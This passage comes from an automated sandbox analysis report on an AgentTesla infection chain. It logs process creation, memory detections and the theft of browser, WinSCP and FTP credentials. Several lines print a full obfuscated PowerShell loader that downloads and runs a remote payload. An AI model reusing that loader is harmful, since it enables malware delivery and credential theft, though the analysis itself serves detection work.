llbtBevikfCultiaKlav,r SamevUaktueGaskar TrlbsPreac.,dfrlBSundriMarkep Milj Overw&Kastr&Reall Sl.deJu,elcInimihRetrao.nade Pfa.z$.ocho ';Multikunsts (Phenolsulphonate ' ngdo$ DezigPlacelspr nosuburbroupea Tabel tech:Shallf PansuUdt.nn dataksk,frtWilyciOnsweo.ebegnTeabos AutotP vepe SatigFrostnErgotiBr,epnSysteg P,ore Lin.nP stbsH,ldo=Slosh(Tl.enc,arsampaneldCad c shel/JapaccNaitl Gla.s$Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Amarantfarvers.Bip && echo $"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Forsyningssikkerhed = 1;$Skydevinduer172='Substrin';$Skydevinduer172+='g';Function Phenolsulphonate($Sklmsstykkets){$Hvornaar=$Sklmsstykkets.Length-$Forsyningssikkerhed;For($Rekursmyndighedens15=5; $Rekursmyndighedens15 -lt $Hvornaar; $Rekursmyndighedens15+=(6)){$Palatoglossal+=$Sklmsstykkets.$Skydevinduer172.Invoke($Rekursmyndighedens15, $Forsyningssikkerhed);}$Palatoglossal;}function Multikunsts($Gennemskylning){. ($diffusionism) ($Gennemskylning);}$Hydrorhiza=Phenolsulphonate ' KonnMrei toStudiz Chari PlanlStryclun,idaSlger/ elvs5Bowdl.Bes f0Srgem Afski(forduWKa itiFribonBogstdMopokoDriftwetagesBlodr AfpolNForbrTSmaav Albue1Formi0M.lia.An,va0Canyo; Jern sa meW,ilviistedenPoula6Alcdi4Aksel;Jum o AftrrxBesmr6Tidsf4 ,ell;Spect Opercr ,ortv ycon:Tomba1Salva2De.im1 erv.Absi.0Spgel)Tinte KugleGdrawleInte.c,ilmukSt ntoArmsl/ Otte2 T.ng0Resub1Grand0Del e0Misp 1Plows0Je,ns1Feath NgenFUnderiFarthrthroweCo,taf PogooChookxtalje/Haveb1Ret.r2luxur1O.set.Mng e0Exe,u ';$Digteriske=Phenolsulphonate 'Udkl,U StocsBonnbeLystyr nif-.icliAPrevagko oneAttranTranctChon ';$Unbaptise=Phenolsulphonate 'Ga,brhWobbltMilietSpatipUnds sUprob: Cock/Maal./Forh dRetskrTa.rii lucovFrarae Parf. ForbgJolleoCrazio BygggFalsklRecepeFyrvr.Arm,rcWalllo Afkrm Zigg/Byud.u EftecBesgs?je.neeVandsxUnrecpSkdero,iblir Gu,ttsuccu=U gendTilp o Reliw HenknSkraalBromoo ,eora.ockedArelh&InderiGrisgd T.nn= Stif1 ,ignr irlo6 Bela8fo,pe8be,anrFo.siMYaretFDenot1A,sgeEMormyK Til.KSt.alwSeriatHackb1Wagge9I.fuskNut,iWTyv gaDrgliHJurymj K,stjLamp,LKultuQTomastspyttO iteMRenliQS,hinJ.itsthesop,-,oboteClass6Klike ';$Polemiseres=Phenolsulphonate 'Owlis>G und ';$diffusionism=Phenolsulphonate ' ideoiSjakke Tru,x,arer ';$Offtype='Danernes';Multikunsts (Phenolsulphonate 'AnthrSBooteeHomeltRe ov-Do,anCSei noSigaunKonklt Gce.eNaturnSchretom.or Flkke- IndtP O reaS.lemtElmeth Comm PyritTLempe:.oksa\AftalHA.pomaSupern FyradPlanlwEx ger nguliGlamot Faste vale. cac tSago x .emitFrihe Ekstr-DisciVKitcha siel .loduTilste P im Dish$Beac.OOrth,f Platfte,antDioceyOrbitpDeranePseud;d.cim ');Multikunsts (Phenolsulphonate 'AnfgtiSu,pffVascu jlk(reo.ttEjdameMuldzsKatakt Parc- DdempMaamca.remktGas rhMoist Sel T.alae:Lset \Ski pHIsochaMyodenItalid Tituw rsmar ,rooi M crt Uregeferro.ManattGeledxSalontC eap) .ono{Softwetre,ix Accei PlantUnsha}Ollco;Spri. ');$Overreach161 = Phenolsulphonate 'KogekeStockcRedubhOverco erri rh,ce%zo.elaTch,tpDusinphove.d cyclaCoendtNonr.aFly.e%Antit\WaughAImmormPhre.aDistur .oncaKristnF llbtBevikfCultiaKlav,r SamevUaktueGaskar TrlbsPreac.,dfrlBSundriMarkep Milj Overw&Kastr&Reall Sl.deJu,elcInimihRetrao.nade Pfa.z$.ocho ';Multikunsts (Phenolsulphonate ' ngdo$ DezigPlacelspr nosuburbroupea Tabel tech:Shallf PansuUdt.nn dataksk,frtWilyciOnsweo.ebegnTeabos AutotP vepe SatigFrostnErgotiBr,epnSysteg P,ore Lin.nP stbsH,ldo=Slosh(Tl.enc,arsampaneldCad c shel/JapaccNaitl Gla.s$Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Amarantfarvers.Bip && echo $"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$forsyningssikkerhed = 1;$skydevinduer172='substrin';$skydevinduer172+='g';function phenolsulphonate($sklmsstykkets){$hvornaar=$sklmsstykkets.length-$forsyningssikkerhed;for($rekursmyndighedens15=5; $rekursmyndighedens15 -lt $hvornaar; $rekursmyndighedens15+=(6)){$palatoglossal+=$sklmsstykkets.$skydevinduer172.invoke($rekursmyndighedens15, $forsyningssikkerhed);}$palatoglossal;}function multikunsts($gennemskylning){. ($diffusionism) ($gennemskylning);}$hydrorhiza=phenolsulphonate ' konnmrei tostudiz chari planlstryclun,idaslger/ elvs5bowdl.bes f0srgem afski(forduwka itifribonbogstdmopokodriftwetagesblodr afpolnforbrtsmaav albue1formi0m.lia.an,va0canyo; jern sa mew,ilviistedenpoula6alcdi4aksel;jum o aftrrxbesmr6tidsf4 ,ell;spect opercr ,ortv ycon:tomba1salva2de.im1 erv.absi.0spgel)tinte kuglegdrawleinte.c,ilmukst ntoarmsl/ otte2 t.ng0resub1grand0del e0misp 1plows0je,ns1feath ngenfunderifarthrthroweco,taf pogoochookxtalje/haveb1ret.r2luxur1o.set.mng e0exe,u ';$digteriske=phenolsulphonate 'udkl,u stocsbonnbelystyr nif-.icliaprevagko oneattrantranctchon ';$unbaptise=phenolsulphonate 'ga,brhwobbltmilietspatipunds suprob: cock/maal./forh dretskrta.rii lucovfrarae parf. forbgjolleocrazio bygggfalsklrecepefyrvr.arm,rcwalllo afkrm zigg/byud.u eftecbesgs?je.neevandsxunrecpskdero,iblir gu,ttsuccu=u gendtilp o reliw henknskraalbromoo ,eora.ockedarelh&inderigrisgd t.nn= stif1 ,ignr irlo6 bela8fo,pe8be,anrfo.simyaretfdenot1a,sgeemormyk til.kst.alwseriathackb1wagge9i.fusknut,iwtyv gadrglihjurymj k,stjlamp,lkultuqtomastspytto itemrenliqs,hinj.itsthesop,-,oboteclass6klike ';$polemiseres=phenolsulphonate 'owlis>g und ';$diffusionism=phenolsulphonate ' ideoisjakke tru,x,arer ';$offtype='danernes';multikunsts (phenolsulphonate 'anthrsbooteehomeltre ov-do,ancsei nosigaunkonklt gce.enaturnschretom.or flkke- indtp o reas.lemtelmeth comm pyrittlempe:.oksa\aftalha.pomasupern fyradplanlwex ger nguliglamot faste vale. cac tsago x .emitfrihe ekstr-discivkitcha siel .lodutilste p im dish$beac.oorth,f platfte,antdioceyorbitpderanepseud;d.cim ');multikunsts (phenolsulphonate 'anfgtisu,pffvascu jlk(reo.ttejdamemuldzskatakt parc- ddempmaamca.remktgas rhmoist sel t.alae:lset \ski phisochamyodenitalid tituw rsmar ,rooi m crt uregeferro.manattgeledxsalontc eap) .ono{softwetre,ix accei plantunsha}ollco;spri. ');$overreach161 = phenolsulphonate 'kogekestockcredubhoverco erri rh,ce%zo.elatch,tpdusinphove.d cyclacoendtnonr.afly.e%antit\waughaimmormphre.adistur .oncakristnf llbtbevikfcultiaklav,r samevuaktuegaskar trlbspreac.,dfrlbsundrimarkep milj overw&kastr&reall sl.deju,elcinimihretrao.nade pfa.z$.ocho ';multikunsts (phenolsulphonate ' ngdo$ dezigplacelspr nosuburbroupea tabel tech:shallf pansuudt.nn dataksk,frtwilycionsweo.ebegnteabos autotp vepe satigfrostnergotibr,epnsysteg p,ore lin.np stbsh,ldo=slosh(tl.enc,arsampaneldcad c shel/japaccnaitl gla.s$
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$forsyningssikkerhed = 1;$skydevinduer172='substrin';$skydevinduer172+='g';function phenolsulphonate($sklmsstykkets){$hvornaar=$sklmsstykkets.length-$forsyningssikkerhed;for($rekursmyndighedens15=5; $rekursmyndighedens15 -lt $hvornaar; $rekursmyndighedens15+=(6)){$palatoglossal+=$sklmsstykkets.$skydevinduer172.invoke($rekursmyndighedens15, $forsyningssikkerhed);}$palatoglossal;}function multikunsts($gennemskylning){. ($diffusionism) ($gennemskylning);}$hydrorhiza=phenolsulphonate ' konnmrei tostudiz chari planlstryclun,idaslger/ elvs5bowdl.bes f0srgem afski(forduwka itifribonbogstdmopokodriftwetagesblodr afpolnforbrtsmaav albue1formi0m.lia.an,va0canyo; jern sa mew,ilviistedenpoula6alcdi4aksel;jum o aftrrxbesmr6tidsf4 ,ell;spect opercr ,ortv ycon:tomba1salva2de.im1 erv.absi.0spgel)tinte kuglegdrawleinte.c,ilmukst ntoarmsl/ otte2 t.ng0resub1grand0del e0misp 1plows0je,ns1feath ngenfunderifarthrthroweco,taf pogoochookxtalje/haveb1ret.r2luxur1o.set.mng e0exe,u ';$digteriske=phenolsulphonate 'udkl,u stocsbonnbelystyr nif-.icliaprevagko oneattrantranctchon ';$unbaptise=phenolsulphonate 'ga,brhwobbltmilietspatipunds suprob: cock/maal./forh dretskrta.rii lucovfrarae parf. forbgjolleocrazio bygggfalsklrecepefyrvr.arm,rcwalllo afkrm zigg/byud.u eftecbesgs?je.neevandsxunrecpskdero,iblir gu,ttsuccu=u gendtilp o reliw henknskraalbromoo ,eora.ockedarelh&inderigrisgd t.nn= stif1 ,ignr irlo6 bela8fo,pe8be,anrfo.simyaretfdenot1a,sgeemormyk til.kst.alwseriathackb1wagge9i.fusknut,iwtyv gadrglihjurymj k,stjlamp,lkultuqtomastspytto itemrenliqs,hinj.itsthesop,-,oboteclass6klike ';$polemiseres=phenolsulphonate 'owlis>g und ';$diffusionism=phenolsulphonate ' ideoisjakke tru,x,arer ';$offtype='danernes';multikunsts (phenolsulphonate 'anthrsbooteehomeltre ov-do,ancsei nosigaunkonklt gce.enaturnschretom.or flkke- indtp o reas.lemtelmeth comm pyrittlempe:.oksa\aftalha.pomasupern fyradplanlwex ger nguliglamot faste vale. cac tsago x .emitfrihe ekstr-discivkitcha siel .lodutilste p im dish$beac.oorth,f platfte,antdioceyorbitpderanepseud;d.cim ');multikunsts (phenolsulphonate 'anfgtisu,pffvascu jlk(reo.ttejdamemuldzskatakt parc- ddempmaamca.remktgas rhmoist sel t.alae:lset \ski phisochamyodenitalid tituw rsmar ,rooi m crt uregeferro.manattgeledxsalontc eap) .ono{softwetre,ix accei plantunsha}ollco;spri. ');$overreach161 = phenolsulphonate 'kogekestockcredubhoverco erri rh,ce%zo.elatch,tpdusinphove.d cyclacoendtnonr.afly.e%antit\waughaimmormphre.adistur .oncakristnf llbtbevikfcultiaklav,r samevuaktuegaskar trlbspreac.,dfrlbsundrimarkep milj overw&kastr&reall sl.deju,elcinimihretrao.nade pfa.z$.ocho ';multikunsts (phenolsulphonate ' ngdo$ dezigplacelspr nosuburbroupea tabel tech:shallf pansuudt.nn dataksk,frtwilycionsweo.ebegnteabos autotp vepe satigfrostnergotibr,epnsysteg p,ore lin.np stbsh,ldo=slosh(tl.enc,arsampaneldcad c shel/japaccnaitl gla.s$
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$forsyningssikkerhed = 1;$skydevinduer172='substrin';$skydevinduer172+='g';function phenolsulphonate($sklmsstykkets){$hvornaar=$sklmsstykkets.length-$forsyningssikkerhed;for($rekursmyndighedens15=5; $rekursmyndighedens15 -lt $hvornaar; $rekursmyndighedens15+=(6)){$palatoglossal+=$sklmsstykkets.$skydevinduer172.invoke($rekursmyndighedens15, $forsyningssikkerhed);}$palatoglossal;}function multikunsts($gennemskylning){. ($diffusionism) ($gennemskylning);}$hydrorhiza=phenolsulphonate ' konnmrei tostudiz chari planlstryclun,idaslger/ elvs5bowdl.bes f0srgem afski(forduwka itifribonbogstdmopokodriftwetagesblodr afpolnforbrtsmaav albue1formi0m.lia.an,va0canyo; jern sa mew,ilviistedenpoula6alcdi4aksel;jum o aftrrxbesmr6tidsf4 ,ell;spect opercr ,ortv ycon:tomba1salva2de.im1 erv.absi.0spgel)tinte kuglegdrawleinte.c,ilmukst ntoarmsl/ otte2 t.ng0resub1grand0del e0misp 1plows0je,ns1feath ngenfunderifarthrthroweco,taf pogoochookxtalje/haveb1ret.r2luxur1o.set.mng e0exe,u ';$digteriske=phenolsulphonate 'udkl,u stocsbonnbelystyr nif-.icliaprevagko oneattrantranctchon ';$unbaptise=phenolsulphonate 'ga,brhwobbltmilietspatipunds suprob: cock/maal./forh dretskrta.rii lucovfrarae parf. forbgjolleocrazio bygggfalsklrecepefyrvr.arm,rcwalllo afkrm zigg/byud.u eftecbesgs?je.neevandsxunrecpskdero,iblir gu,ttsuccu=u gendtilp o reliw henknskraalbromoo ,eora.ockedarelh&inderigrisgd t.nn= stif1 ,ignr irlo6 bela8fo,pe8be,anrfo.simyaretfdenot1a,sgeemormyk til.kst.alwseriathackb1wagge9i.fusknut,iwtyv gadrglihjurymj k,stjlamp,lkultuqtomastspytto itemrenliqs,hinj.itsthesop,-,oboteclass6klike ';$polemiseres=phenolsulphonate 'owlis>g und ';$diffusionism=phenolsulphonate ' ideoisjakke tru,x,arer ';$offtype='danernes';multikunsts (phenolsulphonate 'anthrsbooteehomeltre ov-do,ancsei nosigaunkonklt gce.enaturnschretom.or flkke- indtp o reas.lemtelmeth comm pyrittlempe:.oksa\aftalha.pomasupern fyradplanlwex ger nguliglamot faste vale. cac tsago x .emitfrihe ekstr-discivkitcha siel .lodutilste p im dish$beac.oorth,f platfte,antdioceyorbitpderanepseud;d.cim ');multikunsts (phenolsulphonate 'anfgtisu,pffvascu jlk(reo.ttejdamemuldzskatakt parc- ddempmaamca.remktgas rhmoist sel t.alae:lset \ski phisochamyodenitalid tituw rsmar ,rooi m crt uregeferro.manattgeledxsalontc eap) .ono{softwetre,ix accei plantunsha}ollco;spri. ');$overreach161 = phenolsulphonate 'kogekestockcredubhoverco erri rh,ce%zo.elatch,tpdusinphove.d cyclacoendtnonr.afly.e%antit\waughaimmormphre.adistur .oncakristnf llbtbevikfcultiaklav,r samevuaktuegaskar trlbspreac.,dfrlbsundrimarkep milj overw&kastr&reall sl.deju,elcinimihretrao.nade pfa.z$.ocho ';multikunsts (phenolsulphonate ' ngdo$ dezigplacelspr nosuburbroupea tabel tech:shallf pansuudt.nn dataksk,frtwilycionsweo.ebegnteabos autotp vepe satigfrostnergotibr,epnsysteg p,ore lin.np stbsh,ldo=slosh(tl.enc,arsampaneldcad c shel/japaccnaitl gla.s$Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$forsyningssikkerhed = 1;$skydevinduer172='substrin';$skydevinduer172+='g';function phenolsulphonate($sklmsstykkets){$hvornaar=$sklmsstykkets.length-$forsyningssikkerhed;for($rekursmyndighedens15=5; $rekursmyndighedens15 -lt $hvornaar; $rekursmyndighedens15+=(6)){$palatoglossal+=$sklmsstykkets.$skydevinduer172.invoke($rekursmyndighedens15, $forsyningssikkerhed);}$palatoglossal;}function multikunsts($gennemskylning){. ($diffusionism) ($gennemskylning);}$hydrorhiza=phenolsulphonate ' konnmrei tostudiz chari planlstryclun,idaslger/ elvs5bowdl.bes f0srgem afski(forduwka itifribonbogstdmopokodriftwetagesblodr afpolnforbrtsmaav albue1formi0m.lia.an,va0canyo; jern sa mew,ilviistedenpoula6alcdi4aksel;jum o aftrrxbesmr6tidsf4 ,ell;spect opercr ,ortv ycon:tomba1salva2de.im1 erv.absi.0spgel)tinte kuglegdrawleinte.c,ilmukst ntoarmsl/ otte2 t.ng0resub1grand0del e0misp 1plows0je,ns1feath ngenfunderifarthrthroweco,taf pogoochookxtalje/haveb1ret.r2luxur1o.set.mng e0exe,u ';$digteriske=phenolsulphonate 'udkl,u stocsbonnbelystyr nif-.icliaprevagko oneattrantranctchon ';$unbaptise=phenolsulphonate 'ga,brhwobbltmilietspatipunds suprob: cock/maal./forh dretskrta.rii lucovfrarae parf. forbgjolleocrazio bygggfalsklrecepefyrvr.arm,rcwalllo afkrm zigg/byud.u eftecbesgs?je.neevandsxunrecpskdero,iblir gu,ttsuccu=u gendtilp o reliw henknskraalbromoo ,eora.ockedarelh&inderigrisgd t.nn= stif1 ,ignr irlo6 bela8fo,pe8be,anrfo.simyaretfdenot1a,sgeemormyk til.kst.alwseriathackb1wagge9i.fusknut,iwtyv gadrglihjurymj k,stjlamp,lkultuqtomastspytto itemrenliqs,hinj.itsthesop,-,oboteclass6klike ';$polemiseres=phenolsulphonate 'owlis>g und ';$diffusionism=phenolsulphonate ' ideoisjakke tru,x,arer ';$offtype='danernes';multikunsts (phenolsulphonate 'anthrsbooteehomeltre ov-do,ancsei nosigaunkonklt gce.enaturnschretom.or flkke- indtp o reas.lemtelmeth comm pyrittlempe:.oksa\aftalha.pomasupern fyradplanlwex ger nguliglamot faste vale. cac tsago x .emitfrihe ekstr-discivkitcha siel .lodutilste p im dish$beac.oorth,f platfte,antdioceyorbitpderanepseud;d.cim ');multikunsts (phenolsulphonate 'anfgtisu,pffvascu jlk(reo.ttejdamemuldzskatakt parc- ddempmaamca.remktgas rhmoist sel t.alae:lset \ski phisochamyodenitalid tituw rsmar ,rooi m crt uregeferro.manattgeledxsalontc eap) .ono{softwetre,ix accei plantunsha}ollco;spri. ');$overreach161 = phenolsulphonate 'kogekestockcredubhoverco erri rh,ce%zo.elatch,tpdusinphove.d cyclacoendtnonr.afly.e%antit\waughaimmormphre.adistur .oncakristnf llbtbevikfcultiaklav,r samevuaktuegaskar trlbspreac.,dfrlbsundrimarkep milj overw&kastr&reall sl.deju,elcinimihretrao.nade pfa.z$.ocho ';multikunsts (phenolsulphonate ' ngdo$ dezigplacelspr nosuburbroupea tabel tech:shallf pansuudt.nn dataksk,frtwilycionsweo.ebegnteabos autotp vepe satigfrostnergotibr,epnsysteg p,ore lin.np stbsh,ldo=slosh(tl.enc,arsampaneldcad c shel/japaccnaitl gla.s$Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected AgentTesla
            Source: Yara matchFile source: 0000000B.00000002.3626677690.0000000021FB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3626677690.0000000021F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3626677690.0000000021FAC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wab.exe PID: 5808, type: MEMORYSTR
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to harvest and steal ftp login credentials
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
            Tries to steal Mail credentials (via file / registry access)
